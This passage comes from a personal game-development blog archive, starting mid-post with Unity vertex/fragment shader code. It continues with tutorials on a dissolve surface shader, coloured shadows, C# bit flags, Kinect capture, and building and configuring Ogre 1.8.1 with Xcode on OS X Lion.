  float3  vertexLighting : TEXCOORD5;
};

That pass’ vertex function is now:

    vertex_output vert(vertex_input v)
    {
      vertex_output o;
      o.pos = mul( UNITY_MATRIX_MVP, v.vertex);
      o.uv = v.texcoord.xy;

      o.lightDir = ObjSpaceLightDir(v.vertex);

      o.normal = v.normal;

      TRANSFER_VERTEX_TO_FRAGMENT(o);              

      o.vertexLighting = float3(0.0, 0.0, 0.0);

      #ifdef VERTEXLIGHT_ON

      float3 worldN = mul((float3x3)_Object2World, SCALED_NORMAL);
      float4 worldPos = mul(_Object2World, v.vertex);

      for (int index = 0; index < 4; index++)
      {    
        float4 lightPosition = float4(unity_4LightPosX0[index], 
        unity_4LightPosY0[index], 
        unity_4LightPosZ0[index], 1.0);

        float3 vertexToLightSource = float3(lightPosition - worldPos);        

        float3 lightDirection = normalize(vertexToLightSource);

        float squaredDistance = dot(vertexToLightSource, vertexToLightSource);

        float attenuation = 1.0 / (1.0  + unity_4LightAtten0[index] * squaredDistance);

        float3 diffuseReflection = attenuation * float3(unity_LightColor[index]) 
          * float3(_Color) * max(0.0, dot(worldN, lightDirection));         

        o.vertexLighting = o.vertexLighting + diffuseReflection * 2;
       }

       #endif

       return o;
      }

and the ForwardBase fragment function is:

fixed4 frag(vertex_output i) : COLOR
{
  i.lightDir = normalize(i.lightDir);
  fixed atten = LIGHT_ATTENUATION(i); 

  fixed4 tex = tex2D(_MainTex, i.uv);
  tex *= _Color + fixed4(i.vertexLighting, 1.0);

  fixed diff = saturate(dot(i.normal, i.lightDir));

  fixed4 c;
  c.rgb = (UNITY_LIGHTMODEL_AMBIENT.rgb * 2 * tex.rgb);         
  c.rgb += (tex.rgb * _LightColor0.rgb * diff) * (atten * 2); 
  c.a = tex.a + _LightColor0.a * atten;
  return c;
}

The source for for the entire shader can be found here.

If you made it this far, congratulations! You now have a diffuse shader that takes into account all the lights unity has to offer! As always, feedback is very welcome (especially if you’ve spotted errors, or things that i’ve gotten wrong). You can find me on Twitter. Hope this tutorial helped!

Making a Dissolve Effect with Surface Shaders

2013-09-28T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I recently posted a shader pack which creates a cool “dissolve” (for lack of a better descriptor) effect, similar to the skin of Skyrim’s dragons during their death animation. As requested by reddit, this post detail exactly what you need to know to write one of these shaders yourself, and hopefully, provide you with a good base with which to modify my shaders to your specific needs. I’m going to attempt to start from square one and not assume any shader experience on your part, but it will probably help if you have a general idea of how to build a basic shader before hand.

Let’s get started.

Getting Started

The obvious first step here is to open up Unity and create a new shader. Unity is going to assume that you would like to create a surface shader, and pre-populate a lot of boiler plate code. Thanks Unity! Now, delete all of it and give yourself a nice, clean slate to work with.

Now that that’s cleaned up, start your shader with the lines:

Shader "MyDissolveShader"
{
	Properties
	{
		
	}
	SubShader
	{
		
	}
}

This is a bit of Unity specific structure; the “Properties” section will allow us to define which variables we want to expose in the inspector, while the “SubShader” section will hold the actual code used in our shader.

Ok, now let’s figure out exactly what we will need the user to define. Take another look at what the effect looks like:

Pretty snazzy, isn't it?

First off, we’re going to need the user to tell us what texture the put on the mesh for its normal undissolved state. The convention with Unity shaders is to call this texture _MainTex. So let’s add that to our properties.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
	}
	SubShader
	{
		
	}
}

The new line in properties shows how to define a regular texture for the inspector. We are going to call this variable _MainTex in our code, so that goes first. The “Main Texture” string in the parentheses defines that we want the inspector to display as this variables name. The subsequent “2D” declares that this slot in the inspector will accept a 2D texture. The “values after the equals sign “white”{} after the equals sign just sets the default value of this field to a generic white texture.

Ok, so now that we’ve figured out how to declare a texture, what other textures will we need? For this shader, we’re not going to use bump maps, so the only other texture we need is something to define the shape of the dissolve effect. Let’s call that _DissolveMap.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
	}
	SubShader
	{
		
	}
}

Ok, aside from our textures we also need 2 floats to control the progress of the effect and size of the edge lines. However, we want to be able to control the range of these floats, so that our users don’t set them to values that are outside of what makes sense for our shader. One way of doing this is with the Range type. Any variables marked as type Range in the properties panel will display as a slider, that moves between the low and high values we define.

Finally, I’m going to add a Color variable to allow us to define what colour the edges of the effect are.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		
	}
}

One thing to note is that we want the range of the dissolve effect to be functionally between 0.0 and 1.0, but in order to account for the line width, we need to expand the range in both directions by the maximum size the lines can be, otherwise lines will show up when the mesh should have no dissolve applied, and when it should be completely transparent.

Ok perfect, so now that that’s taken care of, let’s move on the actually writing a shader!

Setting Things Up

So now we move down to the SubShader tag. We’re going to be writing a surface shader. Surface shaders are a unity specific type of shorthand that takes care of all the lighting specific shader code for you. It’s perfect for our purposes. What this also decides for us is that our shader needs to be written in CG (as opposed to glsl or hlsl).

The first things we need to do with our shader are tell Unity to expect CG code, and what variables we want our code to access from outside of the shader itself.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		ENDCG
	}
}

Most of this is hopefully self explanatory, but the one line that may not be is the #pragma… line. This is a surface shader specific pragma that tells unity that we want our model to be lit according to the Lamber lighting model (diffuse lighting). Behind the scenes, Unity will add the code necessary for this lighting model to our shader when it compiles.

The other lines added are just declarations of the data we’re getting from the inspector, so that our shader knows to use this data. It’s important that the variable names used here are exactly the same as the ones we used in the Properties section. The datatypes here are just the CG equivalents of the types we defined above (there’s no such thing as a Color type in CG, so colours are representing as a 4 element vector).

Now, let’s add the rest of the structural code we need in order for our shader to start taking shape.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
     			half2 uv_MainTex;
     			half2 uv_DissolveMap;
    		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = float4(1.0, 1.0, 1.0, 1.0);
		}
		ENDCG
	}
}

The Input struct defines what information we need to access about each vertex in the model being shaded. In this case, all we need are uv co-ordinates for each of the textures that we’re using. Defining these variables as “uv_” and then a texture name will automatically pull the correct uv’s for that texture.

The surface shader system will handle dealing with the position and normal variables as it needs to, but we don’t need to worry about that.

The surf function that I defined is just a boiler plate surface function. It takes the input we defined, and modifies a SurfaceOutput struct for Unity. This SurfaceOutput data will control what the fragment actually gets shaded as.

The o.Albedo line shows how to set the colour of a fragment. In this case, all we’re doing is assigning each fragment the color white. We’re going to modify this now. The next example will show how to set a fragment to the colour it should be to display _MainTex properly.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
     			half2 uv_MainTex;
     			half2 uv_DissolveMap;
    		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
			
			half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
			
			half4 clear = half4(0.0);
		}
		ENDCG
	}
}

If you’ve worked at all with shaders before this should make sense, we’re looking for what colour is at the position in the texture defined by the uv for this position on the mesh. o.Albedo doesn’t set the alpha of our fragment, so we use .rgb to trim the alpha from this function.

I’ve gone ahead and defined a clear variable (this is a 4 element vector with r g b and a set to 0.0) and grabbed the color of this position in the dissolve map texture as well.

Now we need to get to the good stuff, how to decide whether a given fragment should be shaded with the main texture, the line color, or the clear color.

The Good Stuff

We’re going to decide how to shade each fragment based on the red channel of the dissolve map. If the red value of that texture is above the value of _DissolveVal, we are going to shade that fragment with the line colour. If it is above the value of _DissolveVal + _LineWidth, the fragment will be transparent.

In a regular script, this would usually be done with an if/else statement, but unfortunately shaders don’t do if/else flows that well. You’ll get the correct value, but the shader will end up executing the code for every possible outcome before choosing the correct value. It’s much faster (and more shader-y) to use lerp for this. Lerp will mix two values together based on a third float value (if this value is 0, we end up with 100% of value A, if this is 1, we get 100% of value B). Hopefully this sounds like an if statement to you as well.

We’re going to define an integer that will serve as our conditional. The first choice we need to make is whether or not we are transparent. As stated before, we are only transparent if the red value of dissolve is greater than DissolveValue + LineWidth.

void surf (Input IN, inout SurfaceOutput o) 
{
	o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
	
	half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
	
	half4 clear = half4(0.0);
	
	int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
	int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);
}

The two ints do what their name implies. isClear resolve to 0 if dissolve.r isn’t greater than _DissolvVal + _LineWidth and isAtLeastLine will be 0 if we should use the regular texture instead of using the line color or transparency.

Once we have those two values, the rest is pretty straight forward.

void surf (Input IN, inout SurfaceOutput o) 
{
	o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
	
	half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
	
	half4 clear = half4(0.0);
	
	int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
	int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);
	
	half4 altCol = lerp(_LineColor, clear, isClear);
	
	o.Albedo = lerp(o.Albedo, altCol, isAtLeastLine);
}

In case it isn’t clear, the 2 lines we just added choose whether or not the alt color is clear or the line color, and then choose whether or not we should use the main texture, or the alt color.

We’re almost done! If you switch over to Unity now you might notice that nothing is really going transparent, it’s just going black. This is because we haven’t yet told Unity that this will be a transparent shader. Because of the order things are rendered, you need to explicitly tell Unity when a shader will draw transparent fragments. Luckily this is a pretty simple addition to the top of the shader.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		Tags{ "Queue" = "Transparent"}
		Blend SrcAlpha OneMinusSrcAlpha
		
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
     			half2 uv_MainTex;
     			half2 uv_DissolveMap;
    		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;

			half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);

			half4 clear = half4(0.0);

		int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
		int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);

			half4 altCol = lerp(_LineColor, clear, isClear);

			o.Albedo = lerp(o.Albedo, altCol, isAtLeastLine);
			
			o.Alpha = lerp(1.0, 0.0, isClear);
			
		}
		ENDCG
	}
}

It takes 3 lines to make the shader transparent. The Tags.. line tells Unity to render objects using this shader when it renders transparent geometry and the Blend line defines how our transparency behaves. The one above tells our shader to use alpha blending (as opposed to being additive, or multiplicative transparency). Finally the o.Alpha… line defines the transparency of the fragment being shaded.

Put all together, you have the Dissolve Diffuse shader from my Dissolve Shader pack! Hopefully this tutorial was helpful. Shoot any feedback you have to me on Twitter. Happy shading!

Multi Coloured Shadows In Unity

2013-08-13T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plansto update it. Beware!

UPDATE: I’ve posted a tutorial on how to get coloured shadows working in your project. Check it out here

Lately, in my (precious little) free time, I’ve been working on a custom shadow receiver system which will give me greater control over the appearance of soft shadows in Unity. On the surface, it sounds like a fun project. It gets slightly more insane when you take into account that i had never so much as written my own shadow map system before starting this. Crawling is boring, I tend to jump (metaphorical) cliffs and hope that I figure out flying, running, landing, and crawling by the time I hit ground.

At first, I thought I’d actually start from the ground up and simply disable the Unity shadows altogether and substitute my own depth maps. It works pretty well for one light, but I’ve run into issues trying to pass multiple shadow maps to multiple passes in Unity. I’m not yet sure whether thats a limitation on my own knowledge, or just something that Unity doesn’t let you do. Once I hit that wall though, it occurred to me that it might just be easier to tap into the shadow maps already being generated. It would certainly save a lot of extra scripts, and would benefit from all the work that’s already gone into Unity.

(Manually making shadow maps, the depth map from the light is displayed in the corner)

And so, I (once again) entered the wonderful world of undocumented Unity functionality. This time, I ended up delving through the CGInclude files that come with the built in shaders. The result of this was an interesting set of variables defined in the UnityShaderVariables.cginc and AutoLight.cginc files, namely: unity_World2Shadow[4], _ShadowMapTexture, _LightShadowData and the macro UNITY_SAMPLE_SHADOW_PROJ.

Most of the above is self explanatory, but the macro was something I hadn’t thought about. A lot of functionality is wrapped in macros in the built in shaders, which handle the difference between DirectX and GLSL shading.

Once I knew what the internal variables were called, it was pretty easy to get rudimentary hard shadows up and running using the built in shadow map…. for one light. I’m still working on getting multiple lights working at once, but, in the interest of enjoying small victories, I figured I’d do something a bit fun with the new shadows I had made. Since I now have complete control over the shader producing the shadows, why not change their colour. Therefore, may I present, the most fabulous looking hard shadows ever produced in Unity…probably!

(The purple's darkness gets set by the depth value for that fragment)

A lot of work goes into making games look realistic, but I think that there’s a lot to be said for making games look uniquely different from norm. Purple shadows are how I’m doing that today :D

As always, send me a message on Twitter if you want to chat (especially about games or graphics).

Bit Flags are Pretty Cool

2013-04-21T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans on updating it. Beware!

I’ve been working on prototype for (possibly) my next personal project, and one of the things I’ve needed to do a number of times is store a lot of boolean attributes on different objects. This led to some really terrible looking scripts with a whole host of boolean flags at the top of them, and I decided I needed to find a better way of handling things.

I’ve had some fun before with packing a whole bunch of booleans into byte-sized structs using the bit field operator in C++, but I’ve never seen anything like that done in C#, and if I can help it, I try to avoid dealing directly with memory addresses in Unity scripts. Luckily, bit flags seem to do the exact same job (possibly better). To show you what I mean, let me link an example:

So here’s whats going on: rather than specifying a int or float value for the members of the enum, you can assign each of them a hex number. Provided each of these hex numbers match up to the values represented by each bit in a byte (powers of 2), you can use all of the regular bitwise operations with these new enum values.

Provided the player can only have 1 of each item, you could do an entire inventory this way (not that I think that would be the greatest idea). Nevertheless, it’s certainly handy for fast prototyping, and I’m sure that less contrived examples will find their way into production code at some point.

Fun With The Kinect

2013-03-11T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I’ve been playing around with the Kinect this month (I love that thing). I’ve used it in the past with some gesture control and image processing at work, but I hadn’t really considered it as an option for gamedev, mostly because I don’t have an xbox sdk. I’ve been trying to think of cool ways to use it though, lest it become the coolest dust collector I have in my apartment, and I think I’m on to something this month

As you’ve probably gathered from my other work, I suck at visual art, and it’s probably my least favourite thing to work on when making a game, so any time I can find a cool way to simplify that process I jump on it (why do you think I got into augmented reality?). This month I’ve been experimenting with capturing the output from a kinect and using that in place of 3D models. It may not be useful for all situations, but the results are pretty cool, don’t you think?

Unbreaking the Xcode templates in Xcode 4.5

2012-12-02T00:00:00+00:00

NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

The Xcode templates that come with Ogre 1.81 are rather frustrating to get working, especially if you don’t know what the cryptic error messages that it spits out at you mean. So I’m here today to walk you step by step through getting a basic Ogre project up and running.

All of this is taken from my experiences trying to get Ogre to work on my machine. Given that the templates bundled with Ogre were written by people much more knowledgeable than me, it wouldn’t surprise me if some of these issues aren’t universal problems. Hopefully my experiences are helpful, even if you only hit one of the numerous issues I described here.

###What you will need:###

A built version of Ogre 1.81 (see my previous post for how to build this)
The Ogre Xcode templates installed (found in Ogre’s SDK/OSX folder)

Note: This tutorial was written based on my experience working with Xcode 4.5, and OS X Lion. YMMV if you’re following along with a different configuration.

###Starting the Project###

Let’s start at ground zero. Open Xcode and do the following:

Start a new project, and select the “Mac OS X Application” template in the Ogre category. After naming your project, fill in the path to your Ogre SDK with the appropriate value. Welcome to linker hell.

For some reason, xcode has the annoying tendency to omit the leading / in the include paths in the OGRE template (regardless of whether you remembered to include on in the path to your SDK). So the first thing that has to be done to make this project build-able is to navigate to your build settings, and modify all the file paths located in the Framework Search Paths, Header Search Paths, and Library Search paths so that they begin with a /

Next, move to the “Build Phases” tab and expand the “Link Binary With Libraries” section. You should see Ogre.framework, OpenGL.framework, and QuartzCode.framework appearing in red. I think this is a problem with the template itself, but in any case, it’s easily fixed. For the second two, simply hit the + button and find them in the list of Apple frameworks, andthen delete the red list entries.

Ogre.framework can be found in the lib/debug folder in your build directory, so add that to your project as well.

Now hit build. If everything is identical to my set up, you should get a build error saying that OgreCamera.h can’t be found. Theres a good reason for this: the include paths are missing a few directories. Rather than describe how to fix this, I’ve attached a screenshot of what my include paths end up looking like when I’m through fixing them. “1.81″ is the folder which stores my built Ogre3D library, and “ogre_src_v1-8-1″ is the root folder of the ogre sdk.

This may not be the most optimal way to set up your include paths (I’m really, really hoping it isn’t, it’s pretty messy), but I’ve ran into strange issues marking things recursive, and so far, this set up has worked for me. Let me know if there’s a better way of doing things in the comments, and I’ll update this tutorial.

Next move to the Library Search paths, and ensure that both paths are pointing to the correct location of the files they need. One should be pointing to the location of your ogre lib, and the other to the lib folder of your dependencies. If you hit build and see an error like this:

it means that this step has not been done correctly.

###Restrict your architectures!###

Next ensure that your project is set to build only for the 64 bit architecture. As I mentioned in the last post, currently my set up is only configured to build for 64 bit machines, because I was running into a boat load of configuration errors trying to build for i386 as well. Since I’m nowhere near releasing something with OGRE just yet, I’ve decided to put off figuring out i386 config issues until I absolutely have to.

###Catching a wild Ditto!###

If you hit build now, you should end up with 1 error, the cryptically named “shell script invocation error,” which looks something like this:

It’s a shame that this isn’t more descriptive, because it took me a long time to understand exactly what was going on, but fixing it is dead simple once you know what the error means.

Ogre’s build process involves copying files from your Media paths to the content folder of the built application. This is done at the end of your build process by a shell script, and the script used to copy these files is called ditto. All this error is saying, is that a path supplied to the ditto command is wrong.

To fix this, go back to your project settings, and get to your “Build Phases” tab. Expand the “Run Script” item (should be at the bottom of your build phases list”), and you should immediately see the ditto commands.

The offender is the last line,

ditto $PROJECT_DIR/$PROJECT_NAME/*.cfg “$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/”

(Note: Tutorial.app will be replaced by whatever you called the project on your machine)

There’s a problem with the location of quotation marks here, which is causing the source path to be misinterpreted. Simply move the punctuation around to solve:

ditto “$PROJECT_DIR/$PROJECT_NAME/”*.cfg “$BUILT_PRODUCTS_DIR/OgreTest2.app/Contents/Resources/”

Hit build now, you should (finally) have a successful compile.

###Not there yet.###

Unfortunately, we’re not done. Because now we get to sort through runtime errors. In your output, or your Ogre log file, you should see a message along the lines of

OGRE EXCEPTION(7:InternalErrorException): Could not load dynamic library ./RenderSystem_GL.

This is because we haven’t configured OGRE to know where our Plugins are yet. The quickest way to fix this is to open up the file plugins.cfg, and replace

PluginFolder=./

with

PluginFolder= (path to build/lib/release)

Now, hit build/run one more time, and you should be greeted with this screen:

Hit ok again to finally view the sum of all of our hard work:

Finally, it’s all working! If you run into any problems not addressed here, grab me on twitter and we can work through it. I’d love to dig into this build process more through troubleshooting problems I haven’t hit yet. Additionally, if anyone has a better way of getting all of this done / setting up an Ogre project in Xcode, I’d love to hear about it, because I’m really hoping theres a less messy way of getting it all set up / configuring it for 1386. Regardless, thanks for reading!

Building Ogre 1.81 on Lion

2012-11-19T00:00:00+00:00

NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I’ve recently decided that I need to go open source for my hobby projects, namely because I’ve reached a point where Unity Free is becoming too restrictive for my tastes, yet I’m still too poor to buy Unity Pro (one day I’ll make a game that pays for more than a night at a bar, but that day hasn’t happened yet).

After spending a long week trying to make JMonkey suit my needs (namely: an asset pipeline that doesn’t make me want to shoot myself), I abandoned it and meekly returned to the engine of my third year at Humber: Ogre3D. I had only worked with the precompiled windows binaries until now, but how hard could building it from source (because if I’m going open source, I may as well embrace the whole deal) on my mac be?

Three days of pulling my hair out later, I finally have not only Ogre 1.81 built on my mac, but I also have the Xcode 4 template project compiling, and because theres absolutely no reason that ANYONE should have to spend three days trying to weed through outdated tutorials, I’m posting the whole process here in exhaustive detail, with the hopes that it helps at least one other poor soul trying to do this.

This post will ONLY cover building the engine itself. The next article will cover how to get the Xcode 4 templates to work (they’re broken in some weird spots in Xcode 4.5).

###Ingredients###

OGRE 1.8.1 Source for Linux/OSX
Mac OS X Ogre Dependencies – (this tutorial assumes you’re grabbing the precompiled ones, just to limit the number of things that can go wrong)
CG Framework
CMake 2.8.10.1
This tutorial assumes you’re using Xcode 4.5, although I don’t know if that makes a difference for what we’re doing.

###Setting up the source directory###

Extract the Ogre src zip file into wherever you want your Ogre SDK to be installed to. I just put it in my Macintosh HD directory so that it was easy to find, but I think the more correct place to put it is in ~/Library/Developer/SDKs
Extract the precompiled dependencies into the top level folder in the ogre sdk directoy (in my case /ogre_src_v1-8-1/)
Create a directory in your root folder called “boost”
Drag the folder called boost out of Dependencies/include into the boost folder you just made
Create a folder called lib in the boost folder (ie/ /ogre_src_v1-8-1/boost/lib)
drag the boost libraries at Dependencies/lib into this folder.

###Cooking With CMake###

Start CMake’s GUI tool
Hit the Browse Source button on the top right, and select the ogre sdk folder that you’ve been working with<
Copy and paste this directory into the “Where to build the binaries” field as well. Add the name of your build folder to the end of this path. For me, this was /ogre_src_v1-8-1/1.81, but the name of folder isn’t important, it’s just important that this build folder IS NOT your root sdk folder. That way, if something goes wrong, you can start the build process over again without having to do all the previous steps.
Hit “Configure” and make sure that “Xcode” and “Use default native compilers” is selected. Then click done
You should see a bunch of options highlighted in red. That’s fine. Ensure that OGRE_BUILD_CG is selected, and then press configure again. NOTE: the Cmake console will show a number of warnings in red. IGNORE THESE.
Once that’s done, click “Generate” and exit CMake

###Building Ogre###

Navigate to your build directory now, and open the Xcode project you just generated.
Delete i386 from your project’s valid architectures (otherwise boost complains. Long term, I think only building for 64 bit is going to cause some problems, but in the interest of getting things running quickly, I ignored these worries for now)
Set your project to build for “My Mac 64-bit,” and your Architectures to “64-bit-intel”
Hit build, watch the magic happen.
If you want to, once the build is complete, change your build to release mode and build again to get Ogre built in release.

###Verifying the Build###

You should now have 2 folders in your build directories bin folder. (Release and Debug), inside each folder should be a copy of SampleBrowser.app. To ensure everything is working, run one of these programs and go through each sample.
Hopefully all the samples should be in working order. Congratulations, you now have a built copy of Ogre sitting on your computer!

If you run into any problems, message me on twitter and I’ll do my best to figure out what’s going on with your build. I’m definitely not an expert, or even demonstrably good at using Ogre, but I’d like to think that all the troubleshooting I’ve done this week makes me a decent resource when it comes to just building the engine on mac. Good luck!